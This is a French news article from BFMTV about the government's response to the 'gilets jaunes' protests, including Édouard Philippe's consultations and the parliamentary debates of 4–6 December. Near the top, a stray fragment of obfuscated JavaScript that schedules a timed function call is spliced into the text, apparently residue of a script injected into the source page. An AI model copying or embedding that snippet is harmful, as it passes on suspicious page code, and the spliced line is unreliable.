Gilet jaune: le gouvernement s’engage à présenter de nouvelles mesures
dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomx2 blocx3″>Le Premier ministre Édouard Philippe annoncera de nouvelles “mesures” avant le début de la concertation de 3 mois, et ce, à l’issue des consultations qu’il mène cette semaine face à la crise des “gilets jaunes”.
Après la réception des chefs de partis représentés au Parlement, ce lundi, le Premier ministre recevra mardi après-midi un collectif de “gilets jaunes” prêt à discuter avec l’exécutif, précise Matignon. Il aura mardi 4 décembre un échange avec le Groupe majoritaire à l’Assemblée nationale (LREM)
Le gouvernement annonce également un débat à l’Assemblée nationale mercredi 5 décembre et au Sénat jeudi 6 décembre. Ces débats seront engagés au titre de l’article 50-1 de la Constitution, c’est-à-dire sans engagement de la responsabilité gouvernementale. Matignon n’a pas précisé dans l’immédiat si ce débat donnerait lieu ou non à un vote.
L’ensemble des consultations, ainsi que celles ayant eu lieu la semaine dernière, conduiront le Premier ministre à annoncer les mesures avant le début de la série de concertations qui aura lieu en régions. Elles sont destinées à permettre “le déroulement serein de la concertation décentralisée de trois mois souhaitée par le président de la République, et à assurer le maintien de l’ordre et le respect de la loi” précise Matignon.
Source: BFMTV